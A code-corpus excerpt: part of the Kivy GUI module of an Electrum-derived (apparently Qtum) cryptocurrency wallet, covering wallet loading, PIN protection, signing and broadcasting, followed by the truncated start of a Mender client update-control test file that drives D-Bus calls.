None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
self._periodic_process_queued_invoice = Clock.schedule_interval(self._maybe_process_queued_invoice, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('qtum:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
app.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels:
warning1 = _("Lightning support in Electrum is experimental. "
"Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable "
"from your seed. You must backup your wallet file everytime "
"you create a new channel.")
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning1 + '\n\n' + warning2, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
test_update_control.py
|
#!/usr/bin/python
# Copyright 2022 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import pytest
import subprocess
import sys
import tempfile
import time
from multiprocessing import Process
from mock_server import (
cleanup_deployment_response,
prepare_deployment_response,
setup_mock_server,
EXPIRATION_TIME,
BOOT_EXPIRATION_TIME,
)
from utils.common import put_no_sftp, cleanup_mender_state
# Map UIDs. Randomly chosen, but used throughout for consistency.
MUID = "3702f9f0-b318-11eb-a7b6-c7aece07181e"
MUID2 = "3702f9f0-b318-11eb-a7b6-c7aece07181f"
BETWEEN_EXPIRATIONS = max(EXPIRATION_TIME, BOOT_EXPIRATION_TIME) - 5
FAIL_TIME = EXPIRATION_TIME + BOOT_EXPIRATION_TIME
def start_and_ready_mender_client(connection, second_connection):
def dbus_monitor():
second_connection.run(
"dbus-monitor --system \"type='signal',interface='io.mender.Authentication1'\" > /tmp/dbus-monitor.log"
)
p = Process(target=dbus_monitor, daemon=True)
p.start()
time.sleep(0.5)
try:
connection.run("systemctl start mender-client")
timeout = 120
now = time.time()
while time.time() - now < timeout:
time.sleep(1)
output = connection.run("cat /tmp/dbus-monitor.log")
if "JwtTokenStateChange" in output.stdout.strip():
break
else:
assert (
False
), "Mender client did not broadcast JwtTokenStateChange as expected."
finally:
p.terminate()
connection.run("rm -f cat /tmp/dbus-monitor.log")
def set_update_control_map(connection, m, warn=False):
output = connection.run(
"dbus-send --system --dest=io.mender.UpdateManager --print-reply /io/mender/UpdateManager io.mender.Update1.SetUpdateControlMap string:'%s'"
% json.dumps(m),
warn=warn,
)
assert "int32 %d" % (EXPIRATION_TIME / 2) in output.stdout
def clear_update_control_maps(connection):
connection.run(
(
"for uid in %s %s; do "
+ " for priority in `seq -10 10`; do "
+ """ dbus-send --system --dest=io.mender.UpdateManager --print-reply /io/mender/UpdateManager io.mender.Update1.SetUpdateControlMap string:'{"id":"'$uid'","priority":'$priority'}';"""
+ " done;"
+ "done"
)
% (MUID, MUID2),
warn=True,
)
# Deliberately not using a constant for deployment_id. If you want something
# known, you have to pass it in yourself.
def make_and_deploy_artifact(
connection,
device_type,
deployment_id="7e49d892-d5a0-11eb-a6ff-23a7bacac256",
update_control_map=None,
):
with tempfile.NamedTemporaryFile(suffix=".mender") as artifact_file:
artifact_name = os.path.basename(artifact_file.name)[:-7]
subprocess.check_call(
[
"mender-artifact",
"write",
"module-image",
"-t",
device_type,
"-T",
"logger-update-module",
"-n",
artifact_name,
"-o",
artifact_file.name,
]
